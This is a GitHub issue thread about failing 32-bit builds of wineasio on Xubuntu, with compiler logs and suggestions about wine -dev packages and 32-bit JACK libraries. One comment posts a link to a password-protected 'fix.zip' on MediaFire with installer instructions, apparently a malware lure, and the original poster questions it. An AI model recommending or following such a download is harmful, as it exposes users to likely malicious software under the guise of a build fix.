### ISSUE TITLE
Unable to build this on Xubuntu 22.04

### ISSUE THREAD

**Issue by Juppstein** [wineasio/wineasio#97]
I have the current wine-staging 9.16 installed on this system and when I try to build32 wineasio the following is returned:

```
kodi@htpc:~/building/wineasio$ make 32
make build ARCH=i386 M=32
make[1]: Entering directory '/home/kodi/building/wineasio'
gcc -c -I. -Irtaudio/include -I/usr/include/wine -I/usr/include/wine/windows -I/usr/include/wine-development -I/usr/include/wine-development/wine/windows -I/opt/wine-stable/include -I/opt/wine-stable/include/wine/windows -I/opt/wine-staging/include -I/opt/wine-staging/include/wine/windows  -m32 -D_REENTRANT -fPIC -Wall -pipe -fno-strict-aliasing -Wdeclaration-after-statement -Wwrite-strings -Wpointer-arith -Werror=implicit-function-declaration  -O2 -DNDEBUG -fvisibility=hidden -o build32/asio.c.o asio.c
asio.c:44:10: fatal error: objbase.h: No such file or directory
   44 | #include "objbase.h"
      |          ^~~~~~~~~~~
compilation terminated.
make[1]: *** [Makefile.mk:102: build32/asio.c.o] Error 1
make[1]: Leaving directory '/home/kodi/building/wineasio'
make: *** [Makefile:17: 32] Error 2
kodi@htpc:~/building/wineasio$ gcc --version
gcc (Ubuntu 13.2.0-23ubuntu4) 13.2.0

``` 

> Is there a dependency missing or a version mismatch somewhere?  The git was pulled inclusing submodules.
> 
> Any help would be welcomed :)

**Just for others that might run into the same issue: The above could be solved by installing the -dev packages of the currently installed wine version. So for staging that would be apt install wine-staging-dev.**

The current issue I have is that while the 64 bit version can be built, but the 32bit version fumbles with an error:

```
make 32
make build ARCH=i386 M=32
make[1]: Entering directory '/home/kodi/building/wineasio'
winegcc build32/asio.c.o build32/main.c.o build32/regsvr.c.o -shared -m32 -mnocygwin wineasio.dll.spec -L/usr/lib32/wine -L/usr/lib/wine -L/usr/lib/i386-linux-gnu/wine -L/usr/lib/i386-linux-gnu/wine-development -L/opt/wine-stable/lib -L/opt/wine-stable/lib/wine -L/opt/wine-stable/lib32 -L/opt/wine-stable/lib32/wine -L/opt/wine-staging/lib -L/opt/wine-staging/lib/wine -L/opt/wine-staging/lib32 -L/opt/wine-staging/lib32/wine -ljack  \
	-lodbc32 -lole32 -lwinmm -luuid -o build32/wineasio32.dll.so
/usr/bin/ld: skipping incompatible /usr/lib/x86_64-linux-gnu/libjack.so when searching for -ljack
/usr/bin/ld: cannot find -ljack: No such file or directory
/usr/bin/ld: skipping incompatible /usr/lib/x86_64-linux-gnu/libjack.so when searching for -ljack
collect2: error: ld returned 1 exit status
winegcc: /usr/bin/gcc failed
make[1]: *** [Makefile.mk:110: build32/wineasio32.dll.so] Error 2
make[1]: Leaving directory '/home/kodi/building/wineasio'
make: *** [Makefile:17: 32] Error 2
```
Do I need to have jackd1 instead of jack2 installed for this? The thing is that when I try to install that I wants to remove all kinds of other stuffe like all of wine, libasound or even steamtinkerlaunch. I dont really look forward to reinstall all that stuff >D

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Juppstein** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this file, why should I download and why is it on something like MediaFire? Sorry for asking but just linking to a password protected zip on a sharing site triggers this kind of questions.

**Comment by BombFoolGranny** [comment]
I got the same error. Kinda fixed it with `apt install wine-stable-dev`, but still haven't been able to build it because of different new errors.

**Comment by Juppstein** [comment]
I migrated to a new machine running 24.04 and did the build process over there. Worked for the 32bit version but it fizzled for the 64bit one. But since I needed the 32 bit one only anyway I was ok with that :D
